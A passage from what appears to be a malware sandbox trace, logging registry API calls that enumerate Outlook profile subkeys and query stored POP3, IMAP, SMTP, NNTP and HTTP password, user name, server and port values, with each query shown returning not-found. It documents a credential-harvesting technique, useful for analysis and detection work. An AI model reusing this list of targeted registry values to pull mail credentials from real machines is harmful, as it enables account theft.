phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.176] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.176] RegCloseKey (hKey=0x95c) returned 0x0 [0249.176] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.177] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.177] RegCloseKey (hKey=0x95c) returned 0x0 [0249.177] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.177] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.177] RegCloseKey (hKey=0x95c) returned 0x0 [0249.177] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.177] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.177] RegCloseKey (hKey=0x95c) returned 0x0 [0249.177] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.177] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.177] RegCloseKey (hKey=0x95c) returned 0x0 [0249.177] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.177] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.177] RegCloseKey (hKey=0x95c) returned 0x0 [0249.177] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.177] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.177] RegCloseKey (hKey=0x95c) returned 0x0 [0249.177] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.177] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.177] RegCloseKey (hKey=0x95c) returned 0x0 [0249.177] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.178] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.178] RegCloseKey (hKey=0x95c) returned 0x0 [0249.178] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.178] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.178] RegCloseKey (hKey=0x95c) returned 0x0 [0249.178] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.178] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.178] RegCloseKey (hKey=0x95c) returned 0x0 [0249.178] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.178] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.178] RegCloseKey (hKey=0x95c) returned 0x0 [0249.178] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.178] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.178] RegCloseKey (hKey=0x95c) returned 0x0 [0249.178] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.178] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.178] RegCloseKey (hKey=0x95c) returned 0x0 [0249.178] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.178] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.178] RegCloseKey (hKey=0x95c) returned 0x0 [0249.178] LocalFree (hMem=0x5d68100) returned 0x0 [0249.178] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x4, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="3517490d76624c419a828607e2a54604", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.179] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.179] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d67060 [0249.179] wsprintfA (in: param_1=0x5d67060, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604") returned 88 [0249.179] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.179] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.179] RegCloseKey (hKey=0x95c) returned 0x0 [0249.179] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.179] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.179] RegCloseKey (hKey=0x95c) returned 0x0 [0249.179] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.179] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.179] RegCloseKey (hKey=0x95c) returned 0x0 [0249.179] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.179] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.179] RegCloseKey (hKey=0x95c) returned 0x0 [0249.179] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.179] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.179] RegCloseKey (hKey=0x95c) returned 0x0 [0249.179] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.179] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.179] RegCloseKey (hKey=0x95c) returned 0x0 [0249.179] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.180] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.180] RegCloseKey (hKey=0x95c) returned 0x0 [0249.180] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.180] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.180] RegCloseKey (hKey=0x95c) returned 0x0 [0249.180] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.180] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.180] RegCloseKey (hKey=0x95c) returned 0x0 [0249.180] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.180] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.180] RegCloseKey (hKey=0x95c) returned 0x0 [0249.180] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.180] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.180] RegCloseKey (hKey=0x95c) returned 0x0 [0249.180] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.180] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.180] RegCloseKey (hKey=0x95c) returned 0x0 [0249.180] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.180] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.180] RegCloseKey (hKey=0x95c) returned 0x0 [0249.180] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.181] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.181] RegCloseKey (hKey=0x95c) returned 0x0 [0249.181] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.182] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.182] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.182] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.182] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.182] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.182] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.182] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.182] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.182] RegCloseKey (hKey=0x95c) returned 0x0 [0249.182] RegOpenKeyExA (in: 